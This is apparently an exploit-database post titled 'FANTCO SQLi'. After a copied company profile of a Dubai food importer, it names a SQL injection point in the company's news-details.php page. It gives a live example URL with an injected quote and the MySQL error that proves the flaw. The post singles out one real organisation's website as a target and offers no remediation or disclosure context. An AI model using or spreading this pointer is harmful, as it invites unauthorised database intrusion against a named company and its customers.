# Exploit Title:FANTCO SQLi # Date: 10 Sep 2019 # Author: H.BBF3.4 & A.BBF3.4 +++++++++++++++++++++++++ ABOUT FANTCO Faisal Al Nusif Trading Co. L.L.C, (FANTCO) was incorporated in 1996 in Dubai, UAE, with an objective of Import, Export & Distribution of quality food products. FANTCO’s major activities are import and distribution of quality Chilled, Frozen and Dry food products from USA, Europe, South America, Far East and Asian Countries. The core products include Beef, Poultry, Frozen Vegetables, Oil, Dairy and coffee products. FANTCO is the only licensed UAE distributor of Certified Angus Beef brand products from USA. It won the award for the biggest importer in the Middle East continuously from 2009 to 2013. The company supplies and does the logistics services for leading US Restaurant chains, such as Fuddruckers, AppleBees, Cinnabons & SeattleBest Coffee(Cravia),Mooya etc. FANTCO also operates a Van Sales Division which serves Restaurants, Cafeterias, Catering companies and Groceries all across UAE. FANTCO has its own storage facility for Frozen, Chilled and Dry products. The company has a fleet of freezer, chiller & dry trucks for delivery, serviced by experienced staff. ++++++++++++++++++++++++++ # SQL Injection Exploit : ********************** news-details.php?nid= # Example Vulnerable Sites : ************************* [+] https://www.fantco.com/news-details.php?nid=2%27 # Example SQL Database Error : **************************** Error Getting news details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1